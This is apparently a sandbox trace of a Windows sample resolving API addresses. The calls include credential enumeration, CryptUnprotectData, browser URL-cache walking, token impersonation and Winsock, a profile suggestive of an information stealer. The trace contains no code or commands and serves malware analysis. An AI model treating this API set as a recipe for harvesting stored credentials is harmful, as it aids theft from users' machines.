Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = GetFileAttributesExW, address_out = 0x76b5273d	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = OutputDebugStringW, address_out = 0x76b46b91	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = FlushViewOfFile, address_out = 0x76b483d2	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = CreateFileA, address_out = 0x76b5cee8	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = WaitForSingleObjectEx, address_out = 0x76b5bab0	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = GetVersionExA, address_out = 0x76b63861	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = DeleteFileA, address_out = 0x76b547cb	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = DeleteFileW, address_out = 0x76b50f62	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = HeapReAlloc, address_out = 0x7739ff51	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = GetSystemInfo, address_out = 0x76b63728	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = HeapAlloc, address_out = 0x77382dd6	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = HeapCompact, address_out = 0x76b47cf6	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = HeapDestroy, address_out = 0x76b52301	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = UnlockFile, address_out = 0x76b76417	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = CreateFileMappingA, address_out = 0x76b597e9	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = LockFileEx, address_out = 0x76b7692f	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = GetFileSize, address_out = 0x76b50273	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = GetCurrentProcessId, address_out = 0x76b5cac4	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = GetProcessHeap, address_out = 0x76b61280	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = CreateFileW, address_out = 0x76b5cc56	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = FreeLibrary, address_out = 0x76b5d9d0	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = WideCharToMultiByte, address_out = 0x76b6450e	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = GetSystemTimeAsFileTime, address_out = 0x76b62fde	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = GetSystemTime, address_out = 0x76b5ced8	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = FormatMessageA, address_out = 0x76b78868	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = CreateFileMappingW, address_out = 0x76b50a7f	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = MapViewOfFile, address_out = 0x76b5899b	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = QueryPerformanceCounter, address_out = 0x76b5bb9f	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = GetTickCount, address_out = 0x76b5ba60	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = FlushFileBuffers, address_out = 0x76b47f81	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = VirtualFree, address_out = 0x76b61da4	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = VirtualAlloc, address_out = 0x76b62fb6	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = GetCurrentProcess, address_out = 0x76b5cdcf	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = SetEvent, address_out = 0x76b5bccc	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = ResetEvent, address_out = 0x76b5bcb4	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = CreateEventW, address_out = 0x76b63386	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = GetModuleHandleW, address_out = 0x76b6374d	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = IsDebuggerPresent, address_out = 0x76b53ea8	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = UnhandledExceptionFilter, address_out = 0x76b6ed38	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = SetUnhandledExceptionFilter, address_out = 0x76b63d01	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = GetStartupInfoW, address_out = 0x76b63891	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = IsProcessorFeaturePresent, address_out = 0x76b676b5	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = InitializeSListHead, address_out = 0x77395eeb	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = TerminateProcess, address_out = 0x76b52331	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = CreateMutexW, address_out = 0x76b52aee	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = QueryPerformanceFrequency, address_out = 0x76b522a7	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = GetTempPathW, address_out = 0x76b48b33	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = UnlockFileEx, address_out = 0x76b76947	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = SetEndOfFile, address_out = 0x76b52319	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = GetFullPathNameA, address_out = 0x76b63735	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = SetFilePointer, address_out = 0x76b5db36	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = LockFile, address_out = 0x76b7642f	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = OutputDebugStringA, address_out = 0x76b4eb36	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = GetDiskFreeSpaceW, address_out = 0x76b43530	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = InterlockedCompareExchange, address_out = 0x76b5bb92	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = WriteFile, address_out = 0x76b61400	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = GetFullPathNameW, address_out = 0x76b64543	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = HeapFree, address_out = 0x76b5bbd0	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = HeapCreate, address_out = 0x76b63ea2	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = TryEnterCriticalSection, address_out = 0x773832bc	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = ReadFile, address_out = 0x76b596fb	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = AreFileApisANSI, address_out = 0x76b9f311	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = lstrlenA, address_out = 0x76b5a611	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = CloseHandle, address_out = 0x76b5ca7c	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = ExpandEnvironmentStringsA, address_out = 0x76b48a5b	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = WTSGetActiveConsoleSessionId, address_out = 0x76b4480b	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = DeleteCriticalSection, address_out = 0x77389ac5	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = WaitForSingleObject, address_out = 0x76b5ba90	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = InitializeCriticalSection, address_out = 0x7738a149	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = LeaveCriticalSection, address_out = 0x77377760	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = EnterCriticalSection, address_out = 0x773777a0	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = LoadLibraryW, address_out = 0x76b63c01	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = GetVersionExW, address_out = 0x76b53b1a	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = LocalFree, address_out = 0x76b5ca64	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = GetLastError, address_out = 0x76b5bf00	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = lstrlenW, address_out = 0x76b5d9e8	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = GetProcAddress, address_out = 0x76b633d3	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = lstrcpyA, address_out = 0x76b59793	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = LoadLibraryA, address_out = 0x76b6395c	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = lstrcatA, address_out = 0x76b5a19f	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = SetLastError, address_out = 0x76b5bb08	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = VirtualQuery, address_out = 0x76b676d6	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = CreateThread, address_out = 0x76b6375d	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = Sleep, address_out = 0x76b5ba46	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = GetCurrentDirectoryA, address_out = 0x76b4733c	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = SetCurrentDirectoryA, address_out = 0x76b5903d	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = SystemTimeToFileTime, address_out = 0x76b5cecb	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = ReadConsoleW, address_out = 0x76b70e73	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = WriteConsoleW, address_out = 0x76b582f1	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = SetStdHandle, address_out = 0x76b9f589	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = SetEnvironmentVariableA, address_out = 0x76b58921	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = FreeEnvironmentStringsW, address_out = 0x76b61dc3	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = GetEnvironmentStringsW, address_out = 0x76b61dbc	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = GetCommandLineW, address_out = 0x76b6679e	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = GetCommandLineA, address_out = 0x76b698ff	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = GetOEMCP, address_out = 0x76b53db9	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = IsValidCodePage, address_out = 0x76b6c1c0	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = EncodePointer, address_out = 0x7738a295	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = DecodePointer, address_out = 0x7738cd10	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = GetCPInfo, address_out = 0x76b61e2e	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = CompareStringW, address_out = 0x76b59bee	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = LCMapStringW, address_out = 0x76b613d0	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = GetLocaleInfoW, address_out = 0x76b66596	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = InitializeCriticalSectionAndSpinCount, address_out = 0x76b63939	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = TlsAlloc, address_out = 0x76b635a1	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = TlsGetValue, address_out = 0x76b5da70	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = TlsSetValue, address_out = 0x76b5da88	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = TlsFree, address_out = 0x76b613b8	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = GetStringTypeW, address_out = 0x76b667c8	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = GlobalAlloc, address_out = 0x76b59ce1	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = GlobalFree, address_out = 0x76b59cf9	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = FindFirstFileA, address_out = 0x76b62d89	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = FindNextFileA, address_out = 0x76b5a187	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = CopyFileA, address_out = 0x76b7532c	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = GetFileTime, address_out = 0x76b50f6f	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = InterlockedFlushSList, address_out = 0x77383129	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = LoadLibraryExW, address_out = 0x76b54775	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = RaiseException, address_out = 0x76b4eb60	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = RtlUnwind, address_out = 0x76b47f70	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = ExitThread, address_out = 0x7735f611	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = FreeLibraryAndExitThread, address_out = 0x76b4fdb8	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = GetModuleHandleExW, address_out = 0x76b53e39	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = ExitProcess, address_out = 0x76b6214f	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = GetModuleFileNameA, address_out = 0x76b633f6	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = GetStdHandle, address_out = 0x76b61e46	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = GetFileType, address_out = 0x76b675a5	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = GetConsoleCP, address_out = 0x76b62c8a	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = GetConsoleMode, address_out = 0x76b62412	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = IsValidLocale, address_out = 0x76b53de4	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = GetUserDefaultLCID, address_out = 0x76b66584	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = EnumSystemLocalesW, address_out = 0x76b9f3df	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = GetACP, address_out = 0x76b639aa	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = SetFilePointerEx, address_out = 0x76b4f5b2	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = GetTimeZoneInformation, address_out = 0x76b48a3b	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = FindClose, address_out = 0x76b60e62	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = FindFirstFileExA, address_out = 0x76b9f3ef	1	Fn
Module	Load	module_name = USER32.dll, base_address = 0x76c00000	1	Fn
Module	Get Address	module_name = c:\windows\system32\user32.dll, function = IsCharAlphaNumericW, address_out = 0x76c09a7a	1	Fn
Module	Get Address	module_name = c:\windows\system32\user32.dll, function = wsprintfA, address_out = 0x76c13f47	1	Fn
Module	Load	module_name = ADVAPI32.dll, base_address = 0x774c0000	1	Fn
Module	Get Address	module_name = c:\windows\system32\advapi32.dll, function = CryptGenRandom, address_out = 0x774cdfc8	1	Fn
Module	Get Address	module_name = c:\windows\system32\advapi32.dll, function = GetTokenInformation, address_out = 0x774d431c	1	Fn
Module	Get Address	module_name = c:\windows\system32\advapi32.dll, function = ConvertSidToStringSidW, address_out = 0x774d4344	1	Fn
Module	Get Address	module_name = c:\windows\system32\advapi32.dll, function = OpenProcessToken, address_out = 0x774d4304	1	Fn
Module	Get Address	module_name = c:\windows\system32\advapi32.dll, function = ImpersonateLoggedOnUser, address_out = 0x774cc57a	1	Fn
Module	Get Address	module_name = c:\windows\system32\advapi32.dll, function = GetUserNameA, address_out = 0x774ea4b4	1	Fn
Module	Get Address	module_name = c:\windows\system32\advapi32.dll, function = LookupPrivilegeValueA, address_out = 0x774d404a	1	Fn
Module	Get Address	module_name = c:\windows\system32\advapi32.dll, function = RegDisablePredefinedCacheEx, address_out = 0x77503429	1	Fn
Module	Get Address	module_name = c:\windows\system32\advapi32.dll, function = AdjustTokenPrivileges, address_out = 0x774d418e	1	Fn
Module	Get Address	module_name = c:\windows\system32\advapi32.dll, function = RegEnumKeyExA, address_out = 0x774d1481	1	Fn
Module	Get Address	module_name = c:\windows\system32\advapi32.dll, function = RegOpenKeyExA, address_out = 0x774d4907	1	Fn
Module	Get Address	module_name = c:\windows\system32\advapi32.dll, function = IsTextUnicode, address_out = 0x774d448e	1	Fn
Module	Get Address	module_name = c:\windows\system32\advapi32.dll, function = CredEnumerateA, address_out = 0x77507381	1	Fn
Module	Get Address	module_name = c:\windows\system32\advapi32.dll, function = DuplicateToken, address_out = 0x774cc7e6	1	Fn
Module	Get Address	module_name = c:\windows\system32\advapi32.dll, function = RegEnumKeyA, address_out = 0x774ea299	1	Fn
Module	Get Address	module_name = c:\windows\system32\advapi32.dll, function = RegOpenKeyA, address_out = 0x774ccc15	1	Fn
Module	Get Address	module_name = c:\windows\system32\advapi32.dll, function = RegQueryValueExA, address_out = 0x774d48ef	1	Fn
Module	Get Address	module_name = c:\windows\system32\advapi32.dll, function = RegCloseKey, address_out = 0x774d469d	1	Fn
Module	Get Address	module_name = c:\windows\system32\advapi32.dll, function = CryptAcquireContextW, address_out = 0x774cdf14	1	Fn
Module	Get Address	module_name = c:\windows\system32\advapi32.dll, function = CredEnumerateW, address_out = 0x77507481	1	Fn
Module	Get Address	module_name = c:\windows\system32\advapi32.dll, function = CredFree, address_out = 0x774cb2ec	1	Fn
Module	Get Address	module_name = c:\windows\system32\advapi32.dll, function = CryptCreateHash, address_out = 0x774cdf4e	1	Fn
Module	Get Address	module_name = c:\windows\system32\advapi32.dll, function = CryptHashData, address_out = 0x774cdf36	1	Fn
Module	Get Address	module_name = c:\windows\system32\advapi32.dll, function = CryptDestroyHash, address_out = 0x774cdf66	1	Fn
Module	Get Address	module_name = c:\windows\system32\advapi32.dll, function = RegOpenKeyExW, address_out = 0x774d468d	1	Fn
Module	Get Address	module_name = c:\windows\system32\advapi32.dll, function = CryptGetHashParam, address_out = 0x774cdf7e	1	Fn
Module	Get Address	module_name = c:\windows\system32\advapi32.dll, function = RegEnumValueW, address_out = 0x774d48cc	1	Fn
Module	Get Address	module_name = c:\windows\system32\advapi32.dll, function = RegQueryValueExW, address_out = 0x774d46ad	1	Fn
Module	Get Address	module_name = c:\windows\system32\advapi32.dll, function = CryptReleaseContext, address_out = 0x774ce124	1	Fn
Module	Get Address	module_name = c:\windows\system32\advapi32.dll, function = RevertToSelf, address_out = 0x774d1562	1	Fn
Module	Get Address	module_name = c:\windows\system32\advapi32.dll, function = CryptAcquireContextA, address_out = 0x774c91dd	1	Fn
Module	Load	module_name = ole32.dll, base_address = 0x76cd0000	1	Fn
Module	Get Address	module_name = c:\windows\system32\ole32.dll, function = CoCreateInstance, address_out = 0x76d19d0b	1	Fn
Module	Get Address	module_name = c:\windows\system32\ole32.dll, function = CoUninitialize, address_out = 0x76d186d3	1	Fn
Module	Get Address	module_name = c:\windows\system32\ole32.dll, function = CoInitialize, address_out = 0x76ceb636	1	Fn
Module	Load	module_name = USERENV.dll, base_address = 0x74b30000	1	Fn
Module	Get Address	module_name = c:\windows\system32\userenv.dll, function = GetProfilesDirectoryA, address_out = 0x74b3e291	1	Fn
Module	Get Address	module_name = c:\windows\system32\userenv.dll, function = ExpandEnvironmentStringsForUserA, address_out = 0x74b3e53d	1	Fn
Module	Load	module_name = SHLWAPI.dll, base_address = 0x771d0000	1	Fn
Module	Get Address	module_name = c:\windows\system32\shlwapi.dll, function = StrStrIA, address_out = 0x771dd250	1	Fn
Module	Get Address	module_name = c:\windows\system32\shlwapi.dll, function = StrCmpW, address_out = 0x771e8277	1	Fn
Module	Get Address	module_name = c:\windows\system32\shlwapi.dll, function = StrCpyNW, address_out = 0x7720e0e6	1	Fn
Module	Get Address	module_name = c:\windows\system32\shlwapi.dll, function = StrChrW, address_out = 0x771e4640	1	Fn
Module	Get Address	module_name = c:\windows\system32\shlwapi.dll, function = StrCatW, address_out = 0x7720e105	1	Fn
Module	Get Address	module_name = c:\windows\system32\shlwapi.dll, function = StrStrA, address_out = 0x771fc45b	1	Fn
Module	Get Address	module_name = c:\windows\system32\shlwapi.dll, function = wnsprintfW, address_out = 0x771fef87	1	Fn
Module	Get Address	module_name = c:\windows\system32\shlwapi.dll, function = StrChrA, address_out = 0x771dc5e6	1	Fn
Module	Get Address	module_name = c:\windows\system32\shlwapi.dll, function = wnsprintfA, address_out = 0x771fedae	1	Fn
Module	Load	module_name = CRYPT32.dll, base_address = 0x75610000	1	Fn
Module	Get Address	module_name = c:\windows\system32\crypt32.dll, function = CryptUnprotectData, address_out = 0x75645a7f	1	Fn
Module	Load	module_name = WININET.dll, base_address = 0x77230000	1	Fn
Module	Get Address	module_name = c:\windows\system32\wininet.dll, function = FindNextUrlCacheEntryW, address_out = 0x7726989c	1	Fn
Module	Get Address	module_name = c:\windows\system32\wininet.dll, function = FindCloseUrlCache, address_out = 0x77278409	1	Fn
Module	Get Address	module_name = c:\windows\system32\wininet.dll, function = FindFirstUrlCacheEntryW, address_out = 0x7726978a	1	Fn
Module	Load	module_name = ntdll.dll, base_address = 0x77330000	1	Fn
Module	Get Address	module_name = c:\windows\system32\ntdll.dll, function = memcpy, address_out = 0x77364cc0	1	Fn
Module	Get Address	module_name = c:\windows\system32\ntdll.dll, function = memcmp, address_out = 0x77363b1b	1	Fn
Module	Get Address	module_name = c:\windows\system32\ntdll.dll, function = _wcslwr, address_out = 0x773f9e8c	1	Fn
Module	Get Address	module_name = c:\windows\system32\ntdll.dll, function = memmove, address_out = 0x77365000	1	Fn
Module	Get Address	module_name = c:\windows\system32\ntdll.dll, function = memset, address_out = 0x77365340	1	Fn
Module	Get Address	module_name = c:\windows\system32\ntdll.dll, function = wcschr, address_out = 0x77387390	1	Fn
Module	Get Address	module_name = c:\windows\system32\ntdll.dll, function = strrchr, address_out = 0x77365900	1	Fn
Module	Get Address	module_name = c:\windows\system32\ntdll.dll, function = _wcsicmp, address_out = 0x77386f61	1	Fn
Module	Get Address	module_name = c:\windows\system32\ntdll.dll, function = strncpy, address_out = 0x77365790	1	Fn
Module	Get Address	module_name = c:\windows\system32\ntdll.dll, function = strstr, address_out = 0x773775c0	1	Fn
Module	Get Address	module_name = c:\windows\system32\ntdll.dll, function = strncmp, address_out = 0x773a25ec	1	Fn
Module	Get Address	module_name = c:\windows\system32\ntdll.dll, function = strchr, address_out = 0x77377690	1	Fn
Module	Get Address	module_name = c:\windows\system32\ntdll.dll, function = memchr, address_out = 0x77364c00	1	Fn
Module	Get Address	module_name = c:\windows\system32\ntdll.dll, function = strncat, address_out = 0x77365650	1	Fn
Module	Load	module_name = WTSAPI32.dll, base_address = 0x73f10000	1	Fn
Module	Get Address	module_name = c:\windows\system32\wtsapi32.dll, function = WTSQueryUserToken, address_out = 0x73f11f81	1	Fn
Module	Load	module_name = SHELL32.dll, base_address = 0x75bb0000	1	Fn
Module	Get Address	module_name = c:\windows\system32\shell32.dll, function = SHGetSpecialFolderPathA, address_out = 0x75dffb26	1	Fn
Module	Load	module_name = WS2_32.dll, base_address = 0x75a90000	1	Fn
Module	Get Address	module_name = c:\windows\system32\ws2_32.dll, function = 16, address_out = 0x75a96b0e	1	Fn
Module	Get Address	module_name = c:\windows\system32\ws2_32.dll, function = 111, address_out = 0x75a937ad	1	Fn
Module	Get Address	module_name = c:\windows\system32\ws2_32.dll, function = 19, address_out = 0x75a96f01	1	Fn
Module	Get Address	module_name = c:\windows\system32\ws2_32.dll, function = 3, address_out = 0x75a93918	1	Fn
System	Get Time	type = System Time, time = 2019-05-14 15:33:26 (UTC)	1	Fn
System	Get Time	type = Performance Ctr, time = 27207845544	1	Fn
Module	Load	module_name = api-ms-win-core-synch-l1-2-0, base_address = 0x0	1	Fn
Module	Load	module_name = api-ms-win-core-synch-l1-2-0, base_address = 0x6c330000	1	Fn
Module	Get Address	module_name = c:\windows\system32\api-ms-win-core-synch-l1-2-0.dll, function = InitializeCriticalSectionEx, address_out = 0x0	1	Fn
Module	Load	module_name = api-ms-win-core-fibers-l1-1-1, base_address = 0x0	2	Fn
Module	Load	module_name = kernel32, base_address = 0x0	1	Fn
Module	Load	module_name = kernel32, base_address = 0x76b10000	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = FlsAlloc, address_out = 0x76b6418d	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = FlsSetValue, address_out = 0x76b676e6	1	Fn
Module	Load	module_name = api-ms-win-core-synch-l1-2-0, base_address = 0x0	1	Fn
Module	Load	module_name = api-ms-win-core-synch-l1-2-0, base_address = 0x6c330000	1	Fn
Module	Get Address	module_name = c:\windows\system32\api-ms-win-core-synch-l1-2-0.dll, function = InitializeCriticalSectionEx, address_out = 0x0	1	Fn
Module	Load	module_name = api-ms-win-core-fibers-l1-1-1, base_address = 0x0	2	Fn
Module	Load	module_name = kernel32, base_address = 0x0	1	Fn
Module	Load	module_name = kernel32, base_address = 0x76b10000	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = FlsAlloc, address_out = 0x76b6418d	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = FlsGetValue, address_out = 0x76b61e16	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = FlsSetValue, address_out = 0x76b676e6	1	Fn
File	Open	filename = STD_INPUT_HANDLE	1	Fn
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
File	Open	filename = STD_ERROR_HANDLE	1	Fn
Module	Load	module_name = api-ms-win-core-localization-l1-2-1, base_address = 0x0	2	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = LCMapStringEx, address_out = 0x76b9f72b	1	Fn
Module	Get Handle	module_name = c:\windows\system32\kernel32.dll, base_address = 0x76b10000	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = InitializeConditionVariable, address_out = 0x77389981	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = SleepConditionVariableCS, address_out = 0x76b418be	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = WakeAllConditionVariable, address_out = 0x773545a5	1	Fn
Module	Get Handle	module_name = c:\windows\system32\kernel32.dll, base_address = 0x76b10000	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = FlsAlloc, address_out = 0x76b6418d	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = FlsFree, address_out = 0x76b61f61	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = FlsGetValue, address_out = 0x76b61e16	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = FlsSetValue, address_out = 0x76b676e6	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = InitializeCriticalSectionEx, address_out = 0x76b63879	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = InitOnceExecuteOnce, address_out = 0x76b59601	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = CreateEventExW, address_out = 0x76b124d8	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = CreateSemaphoreW, address_out = 0x76b4db8b	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = CreateSemaphoreExW, address_out = 0x76b42111	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = CreateThreadpoolTimer, address_out = 0x76b4b009	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = SetThreadpoolTimer, address_out = 0x773589be	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = WaitForThreadpoolTimerCallbacks, address_out = 0x7734c02a	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = CloseThreadpoolTimer, address_out = 0x7734c0d2	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = CreateThreadpoolWait, address_out = 0x76b43f78	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = SetThreadpoolWait, address_out = 0x77358bfb	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = CloseThreadpoolWait, address_out = 0x7734b567	1	Fn
